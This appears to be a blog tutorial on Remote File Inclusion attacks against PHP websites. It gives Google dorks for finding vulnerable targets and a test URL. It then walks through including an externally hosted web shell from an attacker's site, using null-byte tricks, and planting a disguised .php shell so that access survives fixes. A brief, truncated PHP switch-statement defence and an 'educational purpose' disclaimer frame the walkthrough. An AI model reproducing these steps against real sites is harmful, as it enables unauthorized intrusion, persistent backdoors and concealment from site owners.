NOTE: Hacking
is a illegal activity so don't try on anyone. this tutorial is Only for
educational purpose. If you want to use
this tutorial for miscellaneous purpose please stop reading.
RFI (Remote File Inclusion)
Denial of Service (DoS) .
Attacks such as cross site
scripting (XSS).
Code execution on the web server
Step
1 : To find a Vulnerable site which is Vulnerable For this You will
have to use google dorks Some of the dorks are like this
inurl:/index.php?show=
inurl:/index.php?pg=
inurl:/template.php?pagina=
inurl:/index.php?pagina=
inurl:/index.php?inc=
inurl:/includes/include_onde.php?include_file=
inurl:/index.php?page=
inurl:/index.php?site=
inurl:/index.php?cat=
inurl:/index.php?file=
inurl:/db.php?path_local=
Step
2: To find the Vulnerability of a given website After getting the
website list in google search, we will have to test the Vulnerability of a
website. In order to understand better I will be giving u an example www.targetsite.com Now we have to add the following
keywords to it
"index.php?page=www.google.com”
(Without Quotes)
And it will become like this
www.targetsite.com/index.php?page=http://www.google.com
Hit Enter, If the executed page will direct
us to google homepage, then we can say that the website is vulnerable to
attack.
Step
3: Exploitation of the Vulnerability. After this we will have to
upload the shell to the target website. For this we have to take few things
into consideration , the shell must be in .txt format
(shell.txt) like Locus. You can see the shell page and download shells from www.sh3ll.org . Once we have the shell, we will have
to upload it to and free hosting service and the shell page after uploading
becomes like this
www.yourwebsite.com/shell.txt
After this we will have to add the shell page
to the vulnerable website. This can be done by adding these keywords to the
vulnerable site
www.targetsite.com/index.php?page=www.yourwebsite.com/shell.txt
Sometimes we will have to use null bytes for
it to execute in a successful way. If we receive an error from "shell.txt" then for this we will have to
try "shell.txt?".
If you have a web shell on the site, but want
to make sure you still have access if the owner changes the php script you
could upload your shell to their site. Save the text file to your computer and
rename it from .txt to .php
then simply upload it using the shell you already have on the site
www.targetsite.com/index.php?page=www.yourwebsite.com/shell.txt
But be sure to name it something that is less
obvious to the site owner than shell.php so
that it looks like it is part of the site. Look around at the names of the rest
of the pages.
Protect
your website
Want to still use the index.php?file= but make sure your site isn't vulnerable to RFI?
No problem, just use the "switch" statement (like this site uses)
that defines the pages before hand. The code is shown below:
<
?php
$page
= $_GET['page'];
switch($page){
case
"page1":
include("page1.php");
break;
case
"page2":
include("page2.php");
Legal
Disclaimer : This tutorial is completely for educational purpose only. For any misuse
of this tutorial by any means the author will not be held responsible.
If you have any queries Please comment my posts.
If you have any queries Please comment my posts.
){kind=link}
0 Comments